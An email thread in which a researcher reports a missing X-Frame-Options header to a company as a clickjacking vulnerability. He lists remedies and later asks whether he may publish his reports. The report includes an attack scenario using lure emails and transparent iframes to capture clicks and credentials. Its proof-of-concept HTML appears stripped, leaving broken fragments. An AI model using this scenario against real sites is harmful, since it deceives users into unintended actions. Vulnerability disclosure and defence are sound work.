Re: Vulnerability: Clickjacking Email - ahmedchauhan328@gmail.com

Hi team, I think your company is not interested in my findings as i did not get any response from your side so please tell me what should i do with the reports. Am i allow to public all my reports for educational purposes on my channel.? Thanks and Regards, On Wed, May 22, 2024 at 3:07 AM Ahmed Chauhan wrote: > Hi team, > > this time i founded this vulnerability in your website > > Issue: > > Clickjacking (User Interface redress attack, UI redress attack, UI > redressing) is a malicious technique of tricking a Web user into clicking > on something different from what the user perceives they are clicking on, > thus potentially revealing confidential information or taking control of > their computer while clicking on seemingly innocuous web pages. > > The server didn't return an X-Frame-Options header which means that this > website could be at risk of a clickjacking attack. The X-Frame-Options HTTP > response header can be used to indicate whether or not a browser should be > allowed to render a page in a or > > > > 2.save it as .html eg s.html > 3.and just simply open that.. > > 4. Understanding the Remedial Action for Clickjacking > > Clickjacking can be prevented using a host of client side browser plugins > such as > • NoScript – http://noscript.net > • Web Protection Suite – http://www.comitari.com/Web_Protection_Suite > These plugins are recommended for daily browsing and can also protect > users against additional client side attacks, such as XSS (Cross Site > Scripting). > The above plugins are client side prevention techniques that should be > taught to all application users; however, steps must also be taken from the > developer’s end. > > The following techniques can be used to aid in the prevention of > clickjacking: > > 4.1. X-Frame-Options > > The simplest of all the techniques that only requires a simple > configuration setting; for example, this can be done within Apache using > the following line: > >

Header always append X-Frame-Options
> DENY

> > 4.2. FrameBusting JavaScript > > This method utilizes JavaScript to “bust” iframes. This is done by > checking if the current web page is the top web page (not within a frame) > and if the web page is currently not the top page, then it becomes the top > page. > > The following example segment of code can be used to demonstrate this: > >

if (top.location.hostname !=
> self.location.hostname){
> top.location.href = self.location.href;
> }

> > It should be noted that recent techniques have found to be able to bypass > this clickjacking prevention technique as seen in the whitepaper by web > application security researcher Collin Jackson – > http://www.collinjackson.com/research/xssauditor.pdf. > > 4.3.Unique URL request > > Similar to a CSRF nonce, this can be employed so attackers cannot deliver > the attack URL easily. > > 4.4. CAPTCHAs > > Similar to the way it prevents attackers from spamming a web form, this > can be used as an additional layer of verification on each transaction. > > 4.5. Element Randomization > > Generally it is possible to clickjack due to buttons and links being in a > static area of the web page, allowing attackers to place invisible frames > over them. A technique to prevent this from occurring is to randomize the > links or buttons on load, thus preventing attackers from hard coding static > iframes. > > > Proof of concept: > > image.png > > EXPLOIT: > > the impact is high. This vulnerability can be linked to a multitude of > attacks including keylogging and stealing user credentials. > > An example of an attack on a application could consist of sending out > emails to authenticated users of the application. This would require either > some amount of inside knowledge to target specific users. Alternatively, > mass emails could be sent out in the hope one user logged in to the > application responds. The email would contain an “interesting” link which > directs the victim to a landing page displaying an advert. > > > > On the landing page is a “skip this ad” link that has a transparent iframe > located over it (placed by the attacker). When the victim then clicks on > the link, they will interact with the attacker’s malicious code. > > Further examples of clickjacking attacks can be seen occurring in the past > on social media sites where victims are enticed into clicking links which > spam their contacts as reported by the BBC News – > http://www.bbc.co.uk/news/10224434. > > The clickjacking attack: > > The “clickjacking” attack allows an evil page to click on a “victim site” > on behalf of the visitor. > > Many sites were hacked this way, including Twitter, Facebook, Paypal and > other sites. They are all fixed, of course. > > The idea: > > The idea is very simple. > > Here’s how clickjacking was done with Facebook: > > A visitor is lured to the evil page. It doesn’t matter how. > The page has a harmless-looking link on it (like “get rich now” or “click > here, very funny”). > Over that link the evil page positions a transparent > > Click here! > > > > > > > The above demo attack which i showed you in the above scenario this can > done same on your website by making the exploit according to your website > as your website is vulnerable to click jacking. > > Reference : > https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004) > SOLUTION: > https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet > > Thanks > [image: image.png] > > Regards, > Ahmed >